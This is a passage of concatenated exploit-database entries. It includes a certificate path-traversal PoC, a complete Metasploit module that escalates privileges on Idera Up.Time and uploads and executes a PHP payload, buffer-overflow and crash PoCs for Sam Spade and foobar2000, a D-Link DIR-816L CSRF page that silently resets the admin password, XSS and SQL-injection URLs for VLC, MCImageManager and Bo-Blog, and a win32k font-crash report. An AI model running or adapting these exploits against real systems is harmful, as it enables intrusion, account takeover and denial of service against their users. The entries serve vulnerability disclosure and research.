Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello Email Address []: Then test start a server like this: $ openssl s_server -key key.pem -cert cert.pem -accept 8080 And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'nokogiri' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php, which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands. }, 'License' => MSF_LICENSE, 'Author' => [ 'Denis Andzakovic', # Found file upload bug in post2file.php in 2013 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', 'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>' ], 'References' => [ ['EDB', '37888'], ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php'] ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['Automatic', {}]], 'Privileged' => 'true', 'DefaultTarget' => 0, # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015, # it was discovered again by Ewerson 'Crash' Guimaraes. 'DisclosureDate' => 'Nov 18 2013' )) register_options( [ Opt::RPORT(9999), OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample']) ], self.class) register_advanced_options( [ OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']), OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']), OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe']) ], self.class) end def print_status(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_error(msg='') super("#{rhost}:#{rport} - #{msg}") end def print_good(msg='') super("#{rhost}:#{rport} - #{msg}") end # Application Check def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown end n = Nokogiri::HTML(res.body) uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]') if uptime_text version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first vprint_status("Found version: #{version}") if version >= '7.4.0' && version <= '7.5.0' return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end def create_exec_service(*args) cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args res_service = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'section' => 'ERDCInstance', 'subsection' => 'add', }, 'vars_post' => { 'initialERDCId' => '20', 'target' => '1', 'targetType' => 'systemList', 'systemList' => '1', 'serviceGroupList' => '-10', 'initialMode' => 'standard', 'erdcName' => 'Exploit', 'erdcInitialName' => '', 'erdcDescription' => 'Exploit', 'hostButton' => 'system', 'erdc_id' => '20', 'forceReload' => '0', 'operation' => 'standard', 'erdc_instance_id' => '', 'label_[184]' => 'Script Name', 'value_[184]' => cmd, 'id_[184]' => 'process', 'name_[process]' => '184', 'units_[184]' => '', 'guiBasic_[184]' => '1', 'inputType_[184]' => 'GUIString', 'screenOrder_[184]' => '1', 'parmType_[184]' => '1', 'label_[185]' => 'Arguments', 'value_[185]' => cmdargs, 'id_[185]' => 'args', 'name_[args]' => '185', 'units_[185]' => '', 'guiBasic_[185]' => '1', 'inputType_[185]' => 'GUIString', 'screenOrder_[185]' => '2', 'parmType_[185]' => '1', 'label_[187]' => 'Output', 'can_retain_[187]' => 'false', 'comparisonWarn_[187]' => '-1', 'comparison_[187]' => '-1', 'id_[187]' => 'value_critical_output', 'name_[output]' => '187', 'units_[187]' => '', 'guiBasic_[187]' => '1', 'inputType_[187]' => 'GUIString', 'screenOrder_[187]' => '4', 'parmType_[187]' => '2', 'label_[189]' => 'Response time', 'can_retain_[189]' => 'false', 'comparisonWarn_[189]' => '-1', 'comparison_[189]' => '-1', 'id_[189]' => 'value_critical_timer', 'name_[timer]' => '189', 'units_[189]' => 'ms', 'guiBasic_[189]' => '0', 'inputType_[189]' => 'GUIInteger', 'screenOrder_[189]' => '6', 'parmType_[189]' => '2', 'timing_[erdc_instance_monitored]' => '1', 'timing_[timeout]' => '60', 'timing_[check_interval]' => '10', 'timing_[recheck_interval]' => '1', 'timing_[max_rechecks]' => '3', 'alerting_[notification]' => '1', 'alerting_[alert_interval]' => '120', 'alerting_[alert_on_critical]' => '1', 'alerting_[alert_on_warning]' => '1', 'alerting_[alert_on_recovery]' => '1', 'alerting_[alert_on_unknown]' => '1', 'time_period_id' => '1', 'pageFinish' => 'Finish', 'pageContinue' => 'Continue...', 'isWizard' => '1', 'wizardPage' => '2', 'wizardNumPages' => '2', 'wizardTask' => 'pageFinish', 'visitedPage[1]' => '1', 'visitedPage[2]' => '1' }) end def exploit vprint_status('Trying to login...') # Application Login res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while trying to login') end # Check OS phpfile_name = rand_text_alpha(10) if res_auth.headers['Server'] =~ /Unix/ vprint_status('Found Linux installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph') uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards') cmdargs = "#{uploadpath}#{phpfile_name}.txt" cmd = phppath else vprint_status('Found Windows installation - Setting appropriated PATH') phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe') uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\') cmd = datastore['CmdPath'] cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\"" end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Login success') # Privilege escalation getting user ID res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'page' => 'Users', 'subPage' => 'UserContainer' }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while getting userID.') end matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/) unless matchdata fail_with(Failure::Unknown, 'Unable to find userID for escalation') end get_id = matchdata[0].gsub(/[^\d]/, '') vprint_status('Escalating privileges...') # Privilege escalation post res_priv_elev = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'vars_get' => { 'section' => 'UserContainer', 'subsection' => 'edit', 'id' => "#{get_id}" }, 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'passwordConfirm' => datastore['PASSWORD'], 'firstname' => rand_text_alpha(10), 'lastname' => rand_text_alpha(10), 'location' => '', 'emailaddress' => '', 'emailtimeperiodid' => '1', 'phonenumber' => '', 'phonenumbertimeperiodid' => '1', 'windowshost' => '', 'windowsworkgroup' => '', 'windowspopuptimeperiodid' => '1', 'landingpage' => 'MyPortal', 'isonvacation' => '0', 'receivealerts' => '0', 'activexgraphs' => '0', 'newuser' => 'on', 'newuser' => '1', 'userroleid' => '1', 'usergroupid[]' => '1' } ) unless res_priv_elev fail_with(Failure::Unknown, 'Connection timed out while escalating...') end # Refresing perms vprint_status('Refreshing perms...') res_priv = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}" ) unless res_priv fail_with(Failure::Unknown, 'Connection timed out while refreshing perms') end res_auth = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) unless res_auth fail_with(Failure::Unknown, 'Connection timed out while authenticating...') end if res_auth.get_cookies =~ /login=true/ cookie = Regexp.last_match(1) cookie_split = res_auth.get_cookies.split(';') vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") print_good('Priv. Escalation success') end # CREATING Linux EXEC Service if res_auth.headers['Server'] =~ /Unix/ vprint_status('Creating Linux Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) else # CREATING Windows EXEC Service# vprint_status('Creating Windows Monitor Code exec...') create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs) end # Upload file vprint_status('Uploading file...') up_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'), 'vars_post' => { 'file_name' => "#{phpfile_name}.txt", 'script' => payload.encoded } ) unless up_res fail_with(Failure::Unknown, 'Connection timed out while uploading file.') end vprint_status('Checking Uploaded file...') res_up_check = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt") ) if res_up_check && res_up_check.code == 200 print_good("File found: #{phpfile_name}") else print_error('File not found') return end # Get Monitor ID vprint_status('Fetching Monitor ID...') res_mon_id = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_get' => { 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', 'iDisplayStart' => '0', 'iDisplayLength' => '10', 'sSearch' => 'Exploit' } ) unless res_mon_id fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID') end matchdata = res_mon_id.body.match(/id=?[^>]*>/) unless matchdata fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.') end mon_get_id = matchdata[0].gsub(/[^\d]/, '') print_good("Monitor id aquired:#{mon_get_id}") # Executing monitor send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'main.php'), 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'vars_post' => { 'section' => 'RunERDCInstance', 'subsection' => 'view', 'id' => mon_get_id, 'name' => 'Exploit' } ) else print_error('Cookie not found') end end end

#!/usr/bin/env python # Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 14/11/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version : 1.14 # Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite # Tested on OS : Windows 7 Home Basic # Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http:// ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## # And the Stack #0012F73C 41414141 AAAA #0012F740 41414141 AAAA #0012F744 DEADBEAF ¯¾­Þ # Registers #EAX 00000001 #ECX 00000001 #EDX 00000030 #EBX 00000000 #ESP 0012F74C #EBP 41414141 #ESI 008DA260 #EDI 0176F4E0 #EIP DEADBEAF f = open("sam_spade_browse_url.txt", "w") Junk = "A"* 496 eip_overwrite = "\xaf\xbe\xad\xde" f.write(Junk+eip_overwrite) f.close()

################################## # Andrea Sindoni - @invictus1306 # ################################## XSS vulnerability via metadata 1. Introduction Affected Product: VLC 2.2.1 / WEB INTERFACE Vulnerability Type: XSS 2. Vulnerability Description XSS vulnerability via metadata title 3. Proof of Concept 3.1 Launch: vlc.exe --http-host=127.0.0.1 --http-port=8080 --http-password=andrea 3.2 Open Browser and go to localhost:8080 (for more info see https://wiki.videolan.org/Documentation:Modules/http_intf/) 3.3 Then left username blank and password andrea 3.4 Select poc.mp3 (attached) file 3.5 See Attached image Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38706.zip

---------------------------------------------------------------------------------------------- Title: ==== D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability Credit: ====== Name: Bhadresh Patel Company/affiliation: HelpAG Website: www.helpag.com CVE: ===== CVE-2015-5999 Date: ==== 10-11-2015 (dd/mm/yyyy) Vendor: ====== D-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services. Product: ======= DIR-816L is a wireless AC750 Dual Band Cloud Router Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. Report-Timeline: ============ 27-07-2015: Vendor notification 27-07-2015: Vendor Response/Feedback 05-11-2015: Vendor Fix/Patch 10-11-2015: Public or Non-Public Disclosure Affected Version: ============= <=2.06.B01 Exploitation-Technique: =================== Remote Severity Rating: =================== 7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C) Details: ======= An attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc. Proof Of Concept: ================ 1) User login to DIR-816L wireless router 2) User visits the attacker's malicious web page (attacker.html) 3) attacker.html exploits CSRF vulnerability and changes the admin account password PoC video link: http://youtu.be/UBdR2sUc8Wg Exploit code (attacker.html): <html> <body> <iframe style="display:none" name="hiddenpost"></iframe> <form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf"> <input type="hidden" name="<&#63;xml&#32;version" value=""1&#46;0"&#32;encoding&#61;"UTF&#45;8"&#63;>&#10;<postxml>&#10;<module>&#10;&#9;<service>DEVICE&#46;ACCOUNT<&#47;service>&#10;&#9;<device>&#10;&#9;&#9;<gw&#95;name>DIR&#45;816L<&#47;gw&#95;name>&#10;&#9;&#9;&#10;&#9;&#9;<account>&#10;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>2<&#47;max>&#10;&#9;&#9;&#9;<count>1<&#47;count>&#10;&#9;&#9;&#9;<entry>&#10;&#9;&#9;&#9;&#9;<uid>USR&#45;<&#47;uid>&#10;&#9;&#9;&#9;&#9;<name>Admin<&#47;name>&#10;&#9;&#9;&#9;&#9;<usrid&#47;>&#10;&#9;&#9;&#9;&#9;<password>password<&#47;password>&#10;&#9;&#9;&#9;&#9;<group>0<&#47;group>&#10;&#9;&#9;&#9;&#9;<description&#47;>&#10;&#9;&#9;&#9;<&#47;entry>&#10;&#9;&#9;<&#47;account>&#10;&#9;&#9;<group>&#10;&#9;&#9;&#9;<seqno&#47;>&#10;&#9;&#9;&#9;<max&#47;>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#9;&#9;<&#47;group>&#10;&#9;&#9;<session>&#10;&#9;&#9;&#9;<captcha>1<&#47;captcha>&#10;&#9;&#9;&#9;<dummy&#47;>&#10;&#9;&#9;&#9;<timeout>180<&#47;timeout>&#10;&#9;&#9;&#9;<maxsession>128<&#47;maxsession>&#10;&#9;&#9;&#9;<maxauthorized>16<&#47;maxauthorized>&#10;&#9;&#9;<&#47;session>&#10;&#9;<&#47;device>&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;1<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<web><&#47;web>&#10;&#9;&#9;<https&#95;rport><&#47;https&#95;rport>&#10;&#9;&#9;<stunnel>1<&#47;stunnel>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;&#9;<inbfilter&#47;>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;2<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<active>0<&#47;active>&#10;&#9;&#9;<nat>NAT&#45;1<&#47;nat>&#10;&#9;&#9;<web&#47;>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>INBFILTER<&#47;service>&#10;&#9;<acl>&#10;&#9;&#9;<inbfilter>&#9;&#9;&#10;&#9;&#9;&#9;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>24<&#47;max>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#10;&#9;&#9;<&#47;inbfilter>&#9;&#9;&#10;&#9;<&#47;acl>&#10;&#9;<ACTIVATE>ignore<&#47;ACTIVATE>&#10;<FATLADY>ignore<&#47;FATLADY><SETCFG>ignore<&#47;SETCFG><&#47;module>&#10;<module>&#10;&#9;<service>SHAREPORT<&#47;service>&#10;&#9;<FATLADY>ignore<&#47;FATLADY>&#10;&#9;&#10;<ACTIVATE>ignore<&#47;ACTIVATE><&#47;module>&#10;<module>&#10;&#9;<service>SAMBA<&#47;service>&#10;&#9;<samba>&#9;&#9;&#10;&#9;&#9;&#32;&#32;&#32;&#32;&#10;&#9;&#9;<enable>1<&#47;enable>&#10;&#9;&#9;<auth>1<&#47;auth>&#10;&#10;&#32;&#32;&#32;&#32;<&#47;samba>&#10;<&#47;module>&#10;<&#47;postxml>" /> </form> <script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script> <iframe style="display:none" name="hiddencommit"></iframe> <form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1"> <input type="hidden" name="ACTIONS" value="SETCFG&#44;SAVE&#44;ACTIVATE" /> </form> <script>document.getElementById("csrf1").submit()</script> </body> </html> Patched/Fixed Firmware and notes: ========================== 2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP 2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF Credits: ======= Bhadresh Patel Senior Security Analyst HelpAG (www.helpag.com) ----------------------------------------------------------------------------------------------

# Exploit Title: foobar2000 1.3.9 (.pls; .m3u; .m3u8) Local Crash PoC # Date: 11-15-2015 # Exploit Author: Antonio Z. # Vendor Homepage: http://www.foobar2000.org/ # Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe # Version: 1.3.9 # Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64 import os evil = '\x41' * 256 pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1=http://' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n' m3u = 'http://' + evil m3u8 = 'http://' + evil file = open('Local_Crash_PoC.pls', 'wb') file.write(pls) file.close() file = open('Local_Crash_PoC.m3u', 'wb') file.write(m3u) file.close() file = open('Local_Crash_PoC.m3u8', 'wb') file.write(m3u8) file.close()

source: https://www.securityfocus.com/bid/61825/info MCImageManager is prone to multiple security vulnerabilities. An attacker may exploit these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, manipulate the page and spoof content to misguide users and to disclose or modify sensitive information. Other attacks may also be possible. MCImageManager 3.1.5 and prior versions are vulnerable. http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml File 1.xml: <?xml version="1.0" encoding="UTF-8"?> <playlist> <item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/> <item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/> </playlist> <html> <body> <script> function flvStart() { alert('XSS'); } function flvEnd() { alert('XSS'); } </script> <object width="50%" height="50%"> <param name=movie value="flvPlayer.swf"> <param name=quality value=high> <embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.example1.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"; type="application/x-shockwave-flash"></embed> </object> </body> </html>

# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC # Date: 11-15-2015 # Exploit Author: Antonio Z. # Vendor Homepage: http://www.foobar2000.org/ # Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe # Version: 1.3.9 # Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64 # Instructions: Create playlist.asx: # <asx version="3.0"> # <title>Example.com Live Stream</title> # # <entry> # <title>Short Announcement to Play Before Main Stream</title> # <ref href="http://example.com/announcement.wma" /> # <param name="aParameterName" value="aParameterValue" /> # </entry> # # <entry> # <title>Example radio</title> # <ref href="http://example.com" /> # <author>Example.com</author> # <copyright>example.com</copyright> # </entry> # </asx> import os import shutil evil = 'A' * 256 shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx') file = open('Local_Crash_PoC.asx','r') file_data = file.read() file.close() file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />') file = open('Local_Crash_PoC.asx','w') file.write(file_new_data) file.close()

source: https://www.securityfocus.com/bid/61880/info Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible. Bo-Blog 2.1.1 is vulnerable; other versions may also be affected. http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi] http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS] http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]

Source: https://code.google.com/p/google-security-research/issues/detail?id=507 We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below: --- DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6) N bytes of memory was allocated and more than N bytes are being referenced. This cannot be protected by try-except. When possible, the guilty driver's name (Unicode string) is printed on the bugcheck screen and saved in KiBugCheckDriver. Arguments: Arg1: fffff900c49ab000, memory referenced Arg2: 0000000000000001, value 0 = read operation, 1 = write operation Arg3: fffff96000324c14, if non-zero, the address which referenced memory. Arg4: 0000000000000000, (reserved) [...] FAULTING_IP: win32k!or_all_N_wide_rotated_need_last+70 fffff960`00324c14 410802 or byte ptr [r10],al MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT BUGCHECK_STR: 0xD6 CURRENT_IRQL: 0 TRAP_FRAME: fffff88007531690 -- (.trap 0xfffff88007531690) .trap 0xfffff88007531690 NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007 rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000 rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5 r8=00000000ffffffff r9=fffff900c1b48995 r10=fffff900c49ab000 r11=0000000000000007 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc win32k!or_all_N_wide_rotated_need_last+0x70: fffff960`00324c14 410802 or byte ptr [r10],al ds:0b08:fffff900`c49ab000=?? .trap Resetting default scope LAST_CONTROL_TRANSFER: from fffff8000294a017 to fffff800028cd5c0 STACK_TEXT: fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70 fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5 fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54 fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002 fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0 fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368 --- While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system. We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.: --- rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780 r8=000000000000021d r9=fffff900c4edf000 r10=fffff880056253f4 r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc win32k!PopThreadGuardedObject+0x16: fffff960`00271f6a 4c8918 mov qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=???????????????? --- While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs. The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes. Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip

